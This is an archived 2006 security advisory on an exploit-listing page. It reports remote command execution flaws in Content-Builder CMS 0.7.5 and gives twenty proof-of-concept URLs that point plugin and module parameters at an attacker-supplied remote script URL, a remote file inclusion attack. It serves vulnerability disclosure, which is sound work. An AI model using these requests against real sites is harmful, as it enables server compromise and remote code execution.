f_cbc-0.7.5.txt

f_cbc-0.7.5.txt: Posted Jun 12, 2006; Authored by Federico Fazzi; Content-Builder (CMS) version 0.7.5 is susceptible to multiple remote command execution vulnerabilities.; tags | exploit, remote, vulnerability; SHA-256 | eae7ab62dcec19ad0d73639301f30c28539436f4e1bd29173593cdda1e033d73; Download | Favorite | View

f_cbc-0.7.5.txt

-----------------------------------------------------
Advisory id: FSA:012

Author:    Federico Fazzi
Date:     11/06/2006, 22:30
Sinthesis: Content-Builder (CMS) 0.7.5, Remote command execution
Type:     high
Product:   http://www.content-builder.de/
Patch:     unavailable
-----------------------------------------------------


1) Description:

vulnerables page:

Multiple vulnerabilities, see poc.

2) Proof of concept:

http://example/[cb_path]/cms/plugins/col_man/column.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/poll/poll.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/user_managment/usrPortrait.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/user_managment/user.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/media_manager/media.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/events/permanent.eventMonth.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/events/events.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/newsletter2/newsletter.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/modules/guestbook/guestbook.inc.php?path[cb]=[cmd_url]/
http://example/[cb_path]/modules/shoutbox/shoutBox.php?path[cb]=[cmd_url]/
http://example/[cb_path]/modules/download/overview.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/download/detailView.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/sitemap/sitemap.inc.php?path[cb]=[cmd_url]/
http://example/[cb_path]/modules/article/fullarticle.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article/comments.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article2/overview.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article2/fullarticle.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article2/comments.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/headline/headlineBox.php?rel=[cmd_url]/
http://example/[cb_path]/modules/headline/showHeadline.inc.php?rel=[cmd_url]/

(note: add a cmd url with final slash (/))

3) Solution:

sanitized all variables on all files.

Top Authors In Last 30 Days

Red Hat 243 files
Ubuntu 85 files
Gentoo 31 files
Debian 17 files
tmrswrr 8 files
Sina Kheirkhah 7 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
bRpsd 3 files
Jerry Thomas 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,448)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,344)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,672)
UNIX (9,427)
UnixWare (187)
Windows (6,666)
Other

f_cbc-0.7.5.txt

f_cbc-0.7.5.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

f_cbc-0.7.5.txt

Share This

f_cbc-0.7.5.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems